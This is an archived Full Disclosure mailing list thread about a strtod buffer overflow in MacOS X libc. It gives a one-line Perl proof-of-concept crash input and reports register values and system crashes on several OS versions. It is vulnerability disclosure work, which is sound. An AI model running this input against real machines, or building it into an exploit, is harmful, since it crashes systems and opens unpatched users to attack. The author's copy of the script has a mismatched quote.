|
Full Disclosure
mailing list archives
Re: MacOS X 10.5/10.6 libc/strtod(3) buffer overflow
From: Maksymilian Arciemowicz <cxib () securityreason com>
Date: Mon, 11 Jan 2010 20:46:21 +0100
I have not checked this issue in macos 10.4. In MacOS 10.1 does not
work. But the perl script (in macos 10.5)
Chujwamwmuzg.pl ---
#!/usr/local/bin/perl
printf "% 0.4194310f, 0x0.0x41414141;
Chujwamwmuzg.pl ---
will crash with
esi = 0x41414141
edi = 0x15
Other bugs in libc also work on new versions of macos. Example overflow
in FTSENT structure
http://securityreason.com/achievement_securityalert/60
http://securityreason.com/achievement_securityalert/68
We confirmed this issue in MacOS 10.1.
Joshua Levitsky wrote:
and it then rebooted my mac :)
On Mon, Jan 11, 2010 at 1:57 PM, Joshua Levitsky <jlevitsk () joshie com
<mailto:jlevitsk () joshie com>> wrote:
The below hosed my terminal session on 10.4.11... I did this in a
>console login so don't have the results.. You need? or is dropping
me to a blue screen and lack of system response good?
#!/usr/local/bin/perl
printf "%0.4194310f", 0x0.0x41414141;
Perl will crash with
esi = 0x41414141
edi = 0x15
-Josh
--
Best Regards,
------------------------
pub 1024D/A6986BD6 2008-08-22
uid Maksymilian Arciemowicz (cxib)
<cxib () securityreason com>
sub 4096g/0889FA9A 2008-08-22
http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
Attachment:
signature.asc
Description: OpenPGP digital signature
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 By Date 
By Thread
Current thread:
| 
